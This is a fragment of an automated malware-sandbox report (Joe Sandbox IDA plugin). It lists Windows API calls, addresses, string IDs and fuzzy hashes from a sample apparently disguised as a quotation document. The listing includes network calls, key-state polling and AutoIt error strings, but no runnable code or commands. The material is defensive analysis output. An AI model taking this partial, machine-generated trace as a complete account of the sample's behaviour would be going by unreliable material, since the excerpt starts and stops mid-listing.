  • Part of subcall function 00F429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00F4D7D1,00000000,00000000,00000000,00000000,?,00F4D7F8,00000000,00000007,00000000,?,00F4DBF5,00000000), ref: 00F429DE
  • Part of subcall function 00F429C8: GetLastError.KERNEL32(00000000,?,00F4D7D1,00000000,00000000,00000000,00000000,?,00F4D7F8,00000000,00000007,00000000,?,00F4DBF5,00000000,00000000), ref: 00F429F0
• _free.LIBCMT ref: 00F42CA0
• _free.LIBCMT ref: 00F42CAB
• _free.LIBCMT ref: 00F42CB6
• _free.LIBCMT ref: 00F42CC1
• _free.LIBCMT ref: 00F42CCC
• _free.LIBCMT ref: 00F42CD7
• _free.LIBCMT ref: 00F42CE2
• _free.LIBCMT ref: 00F42CED
• _free.LIBCMT ref: 00F42CFB
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 2337b247769be4598e2d75ca982d5684056cd83d57d1d353aa74cbeb1278ca71
• Instruction ID: 50d89c94f672c55486e5a8f1f38975aac1ef9fe930be2da2c9424129e5a29290
• Opcode Fuzzy Hash: 2337b247769be4598e2d75ca982d5684056cd83d57d1d353aa74cbeb1278ca71
• Instruction Fuzzy Hash: 1B119276500108AFDB82EF59DC82CDD3FB5FF05350F9144A5FA489B222DA35EA50BB90
APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00F11459
• OleUninitialize.OLE32(?,00000000), ref: 00F114F8
• UnregisterHotKey.USER32(?), ref: 00F116DD
• DestroyWindow.USER32(?), ref: 00F524B9
• FreeLibrary.KERNEL32(?), ref: 00F5251E
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 00F5254B
Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
• String ID: close all
• API String ID: 469580280-3243417748
• Opcode ID: 38ce89d782146164af42b7cd12d843ed8583e7c78766566613b373861a0d3948
• Instruction ID: d365b8062d66e0158282e28843e69154f23b369d829c24d3ad0afc033ed68b9c
• Opcode Fuzzy Hash: 38ce89d782146164af42b7cd12d843ed8583e7c78766566613b373861a0d3948
• Instruction Fuzzy Hash: F0D1D531701212CFCB19EF14C895B69F7A0BF06711F1442ADEA4A6B252DB31EC56EF91
APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F87FAD
• SetCurrentDirectoryW.KERNEL32(?), ref: 00F87FC1
• GetFileAttributesW.KERNEL32(?), ref: 00F87FEB
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00F88005
• SetCurrentDirectoryW.KERNEL32(?), ref: 00F88017
• SetCurrentDirectoryW.KERNEL32(?), ref: 00F88060
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00F880B0
Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: CurrentDirectory$AttributesFile
• String ID: *.*
• API String ID: 769691225-438819550
• Opcode ID: bf5d729aad3b10327ecd31261d7c0aee4d94d72680356fa375f67ef3511965e6
• Instruction ID: 51c55b71b6b35d3c329c2ca4d2d4b92c7303e0cf8a73c2396559902d16b83e78
• Opcode Fuzzy Hash: bf5d729aad3b10327ecd31261d7c0aee4d94d72680356fa375f67ef3511965e6
• Instruction Fuzzy Hash: BE81B3729083459BCB20FF14C844AEAB7E8BF85360F64485EF489C7250DB74DD45AB92
APIs
• SetWindowLongW.USER32(?,000000EB), ref: 00F15C7A
  • Part of subcall function 00F15D0A: GetClientRect.USER32(?,?), ref: 00F15D30
  • Part of subcall function 00F15D0A: GetWindowRect.USER32(?,?), ref: 00F15D71
  • Part of subcall function 00F15D0A: ScreenToClient.USER32(?,?), ref: 00F15D99
• GetDC.USER32 ref: 00F546F5
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00F54708
• SelectObject.GDI32(00000000,00000000), ref: 00F54716
• SelectObject.GDI32(00000000,00000000), ref: 00F5472B
• ReleaseDC.USER32(?,00000000), ref: 00F54733
• MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00F547C4
Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
• String ID: U
• API String ID: 4009187628-3372436214
• Opcode ID: 0c865bc0d30626c0bb98891d74ef05b6497d8fe41ff9051002a36d34635f9d95
• Instruction ID: 0d58f731dd47426bdb570cab8a0eae3313b0473fb61617af4f35eb6e879134e2
• Opcode Fuzzy Hash: 0c865bc0d30626c0bb98891d74ef05b6497d8fe41ff9051002a36d34635f9d95
• Instruction Fuzzy Hash: 8B71F535900209DFCF218F64D984AFA7BB1FF4A32AF144265EE555A266C730A8C5FF90
APIs
• LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00F835E4
  • Part of subcall function 00F19CB3: _wcslen.LIBCMT ref: 00F19CBD
• LoadStringW.USER32(00FE2390,?,00000FFF,?), ref: 00F8360A
Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LoadString$_wcslen
                                                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                    • API String ID: 4099089115-2391861430
                                                                                                                    • Opcode ID: 58ad523359518914ed3de38eb5e15c737ef7665dfc7c39acbfba28fa29b1c722
                                                                                                                    • Instruction ID: be97b96756309282af49035d2fd66add8d5db7791ed5c93c3df80b46e70d8bb2
                                                                                                                    • Opcode Fuzzy Hash: 58ad523359518914ed3de38eb5e15c737ef7665dfc7c39acbfba28fa29b1c722
                                                                                                                    • Instruction Fuzzy Hash: 89518E72C0421ABADF14EBA0CC42EEDBB39AF04710F044125F505721A1EB746AD8FFA1
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F29BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F29BB2
                                                                                                                      • Part of subcall function 00F2912D: GetCursorPos.USER32(?), ref: 00F29141
                                                                                                                      • Part of subcall function 00F2912D: ScreenToClient.USER32(00000000,?), ref: 00F2915E
                                                                                                                      • Part of subcall function 00F2912D: GetAsyncKeyState.USER32(00000001), ref: 00F29183
                                                                                                                      • Part of subcall function 00F2912D: GetAsyncKeyState.USER32(00000002), ref: 00F2919D
                                                                                                                    • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00FA8B6B
                                                                                                                    • ImageList_EndDrag.COMCTL32 ref: 00FA8B71
                                                                                                                    • ReleaseCapture.USER32 ref: 00FA8B77
                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00FA8C12
                                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00FA8C25
                                                                                                                    • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00FA8CFF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                    • API String ID: 1924731296-2107944366
                                                                                                                    • Opcode ID: 531d8560a9be4216024eb2bf49163f6eff0a03fc9ae6ce535b26dc6dca881831
                                                                                                                    • Instruction ID: c8ca6a881a8ee91ba4e3e03c0d6ae0073af0ce39564d8f8ea29cac7ef9f474ce
                                                                                                                    • Opcode Fuzzy Hash: 531d8560a9be4216024eb2bf49163f6eff0a03fc9ae6ce535b26dc6dca881831
                                                                                                                    • Instruction Fuzzy Hash: 4851ADB0504304AFD700DF10DC95FAE77E4FB85760F000529F992672A2CBB49944EBA2
                                                                                                                    APIs
                                                                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F8C272
                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F8C29A
                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00F8C2CA
                                                                                                                    • GetLastError.KERNEL32 ref: 00F8C322
                                                                                                                    • SetEvent.KERNEL32(?), ref: 00F8C336
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00F8C341
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3113390036-3916222277
                                                                                                                    • Opcode ID: 3fe1d2ea89e75d68e78e8246fcdeb07d218786bcfb25379e9ccc04c93035c3df
                                                                                                                    • Instruction ID: 714dd90837772956a3d3404a23e38a72d9929877cbb48e739d64bb3b9d3d035d
                                                                                                                    • Opcode Fuzzy Hash: 3fe1d2ea89e75d68e78e8246fcdeb07d218786bcfb25379e9ccc04c93035c3df
                                                                                                                    • Instruction Fuzzy Hash: D5317FB1600608AFDB21AF649C88AAB7BFCEB49754F10851EF446D2240DB34DD05ABF0
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00F53AAF,?,?,Bad directive syntax error,00FACC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00F798BC
                                                                                                                    • LoadStringW.USER32(00000000,?,00F53AAF,?), ref: 00F798C3
                                                                                                                      • Part of subcall function 00F19CB3: _wcslen.LIBCMT ref: 00F19CBD
                                                                                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00F79987
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                    • API String ID: 858772685-4153970271
                                                                                                                    • Opcode ID: ec2458159cddf8aa77c11cf0f0ab175afd91d8604393b321d347ca58dd24a6cd
                                                                                                                    • Instruction ID: db42e77c774a8c1a0842bddf2ed0c853a8395acbe85149a68313d59a22c40664
                                                                                                                    • Opcode Fuzzy Hash: ec2458159cddf8aa77c11cf0f0ab175afd91d8604393b321d347ca58dd24a6cd
                                                                                                                    • Instruction Fuzzy Hash: 42217E3280421AABDF15EF90CC06EEE7775BF19310F04442AF619621A2EB75A658FB51
                                                                                                                    APIs
                                                                                                                    • GetParent.USER32 ref: 00F720AB
                                                                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00F720C0
                                                                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00F7214D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameParentSend
                                                                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                    • API String ID: 1290815626-3381328864
                                                                                                                    • Opcode ID: 90ae2ed4905c94e3ea93488351d874d461c8b52ba792fb6b2aa99da4529a4536
                                                                                                                    • Instruction ID: c3bbc7e06e42e0d832aee4f0ac25d8ceb86960508054cbef80a915ea4005ba6b
                                                                                                                    • Opcode Fuzzy Hash: 90ae2ed4905c94e3ea93488351d874d461c8b52ba792fb6b2aa99da4529a4536
                                                                                                                    • Instruction Fuzzy Hash: 1111E97B688706B9FA016620DC07DA6379CEB05734F604117FB0CA51E1FEA9B8417656
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9a709d2a81250b8482f7e75ecb17a8b56ade382bfc4717c926b993515df1ddc6
                                                                                                                    • Instruction ID: 68ab80fb54706df529f5bc898f1d4be8da2660a6b9ccbd43d57c91af9daf38ca
                                                                                                                    • Opcode Fuzzy Hash: 9a709d2a81250b8482f7e75ecb17a8b56ade382bfc4717c926b993515df1ddc6
                                                                                                                    • Instruction Fuzzy Hash: B0C1B375E082499FDB11DFACDC41BAEBFB0AF49320F044155F914A7292CBB49942EB61
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1282221369-0
                                                                                                                    • Opcode ID: 0db86231facc50f476173f64371f9a9c267e8873ff98a177ba69e2577eac8294
                                                                                                                    • Instruction ID: 8be7226bd2e11d309ba56f3686e71ee009a97539dc19054977cb85148f77a549
                                                                                                                    • Opcode Fuzzy Hash: 0db86231facc50f476173f64371f9a9c267e8873ff98a177ba69e2577eac8294
                                                                                                                    • Instruction Fuzzy Hash: 83612571E05244ABDB61AFB89C81A6A7FA5EF05330F04416DFD409B282EF399D44B7B0
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00FA5186
                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00FA51C7
                                                                                                                    • ShowWindow.USER32(?,00000005,?,00000000), ref: 00FA51CD
                                                                                                                    • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00FA51D1
                                                                                                                      • Part of subcall function 00FA6FBA: DeleteObject.GDI32(00000000), ref: 00FA6FE6
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00FA520D
                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00FA521A
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00FA524D
                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00FA5287
                                                                                                                    • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00FA5296
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3210457359-0
                                                                                                                    • Opcode ID: 4bfbd4b75a4fafad8e70f70ddcecede246582391e7aa4704088f81f2ce0d45b9
                                                                                                                    • Instruction ID: e769735fc55bc24260076a5cc4b512e7c82d78de13c2e087ca2c7c3547e5d018
                                                                                                                    • Opcode Fuzzy Hash: 4bfbd4b75a4fafad8e70f70ddcecede246582391e7aa4704088f81f2ce0d45b9
                                                                                                                    • Instruction Fuzzy Hash: 335190B1A50A08BEEF349F64DC4ABE93BA5FB07B25F144011F6159A2E1C775A980FB40
                                                                                                                    APIs
                                                                                                                    • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00F66890
                                                                                                                    • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00F668A9
                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00F668B9
                                                                                                                    • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00F668D1
                                                                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00F668F2
                                                                                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00F28874,00000000,00000000,00000000,000000FF,00000000), ref: 00F66901
                                                                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00F6691E
                                                                                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00F28874,00000000,00000000,00000000,000000FF,00000000), ref: 00F6692D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1268354404-0
                                                                                                                    • Opcode ID: bbdc44520502d36258a9be22fa31298813bfa829ff4435fa6795eddeb6358c68
                                                                                                                    • Instruction ID: 887fb32b590e6a9c1f02fc2d77faa146c2cfe36669c2745731ac09dfaf63f3a1
                                                                                                                    • Opcode Fuzzy Hash: bbdc44520502d36258a9be22fa31298813bfa829ff4435fa6795eddeb6358c68
                                                                                                                    • Instruction Fuzzy Hash: BB5179B0A00209AFDB20CF25DC95FAA7BB5FF88760F104519F916D72A0DB70E991EB50
                                                                                                                    APIs
                                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F8C182
                                                                                                                    • GetLastError.KERNEL32 ref: 00F8C195
                                                                                                                    • SetEvent.KERNEL32(?), ref: 00F8C1A9
                                                                                                                      • Part of subcall function 00F8C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F8C272
                                                                                                                      • Part of subcall function 00F8C253: GetLastError.KERNEL32 ref: 00F8C322
                                                                                                                      • Part of subcall function 00F8C253: SetEvent.KERNEL32(?), ref: 00F8C336
                                                                                                                      • Part of subcall function 00F8C253: InternetCloseHandle.WININET(00000000), ref: 00F8C341
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 337547030-0
                                                                                                                    • Opcode ID: 453e02b95e3f5ac65dbf01ff9ca1fdb3dbbd64187f02c1b0d3ff6592eb169245
                                                                                                                    • Instruction ID: f1bee96bd8ed9f698e5b388b8166888d93c12535f186360e8d3b3665c9947b6f
                                                                                                                    • Opcode Fuzzy Hash: 453e02b95e3f5ac65dbf01ff9ca1fdb3dbbd64187f02c1b0d3ff6592eb169245
                                                                                                                    • Instruction Fuzzy Hash: 3D3180B1500605AFDB21AFB5DC44AA6BBF8FF19310B00441DF95682660DB35E814BBF0
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F73A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F73A57
                                                                                                                      • Part of subcall function 00F73A3D: GetCurrentThreadId.KERNEL32 ref: 00F73A5E
                                                                                                                      • Part of subcall function 00F73A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00F725B3), ref: 00F73A65
                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F725BD
